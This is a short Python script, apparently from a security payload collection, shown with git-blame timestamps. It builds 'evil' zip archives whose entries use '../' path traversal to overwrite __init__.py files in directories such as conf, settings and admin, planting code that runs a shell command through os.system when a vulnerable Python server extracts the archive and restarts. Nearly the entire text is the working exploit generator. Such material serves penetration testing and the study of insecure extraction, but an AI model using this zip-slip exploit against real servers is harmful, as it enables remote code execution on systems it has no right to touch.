2017-10-09 21:17:31 +00:00
|
|
|
# Generating "evil" zip file
|
|
|
|
# Based on the work of Ajin Abraham
|
|
|
|
# Vuln website : https://github.com/ajinabraham/bad_python_extract
|
|
|
|
# More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution
|
|
|
|
|
|
|
|
# Warning 1: need a restart from the server OR debug=True
|
|
|
|
# Warning 2: you won't get the output of the command (blind rce)
|
|
|
|
import zipfile
|
|
|
|
|
|
|
|
directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"]
|
|
|
|
for d in directories:
|
|
|
|
name = "python-"+d+"-__init__.py.zip"
|
|
|
|
zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED)
|
|
|
|
zipf.close()
|
|
|
|
z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py")
|
|
|
|
z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+
|
|
|
|
z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');")
|
2018-09-02 12:09:55 +00:00
|
|
|
z_info.external_attr = 0o777 << 16
|
2017-10-09 21:17:31 +00:00
|
|
|
z_file.close()
|